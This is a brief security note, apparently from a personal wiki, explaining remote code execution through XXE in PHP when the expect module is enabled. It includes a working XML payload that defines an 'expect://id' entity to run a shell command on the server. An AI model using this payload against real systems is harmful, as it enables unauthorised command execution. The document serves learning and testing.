# RCE via XXE in PHP *If* you're dealing with [[PHP]], and *if* the [[PHP]] expect module is loaded, and *if* XML inputs aren't properly sanitized, then [defining a SYSTEM entity with the value of `expect://$COMMAND` will get you RCE](https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection) via [[XXE attacks|XXE]]. ```xml <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]> <root>&xxerce;</root> ``` Don't expect to run into this often however, as this combination of factors is pretty rare.